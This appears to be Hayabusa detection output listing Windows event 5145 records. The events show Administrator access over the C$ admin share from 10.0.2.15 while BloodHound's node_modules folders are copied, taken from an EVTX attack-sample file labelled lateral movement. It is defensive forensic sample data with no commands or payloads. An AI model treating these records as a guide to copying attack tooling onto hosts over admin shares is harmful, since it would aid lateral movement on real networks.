2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-overlays | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-prop-types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\uncontrollable | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.199 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\cjs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\.github | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\components | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\icons | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\components | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\icons | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\cjs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-lifecycles-compat | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__ | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__\__snapshots__ | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage\lcov-report | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\__tests__ | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\config | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules\react-prop-toggle | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc\wg-meetings | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib\internal | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\regenerator-runtime | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
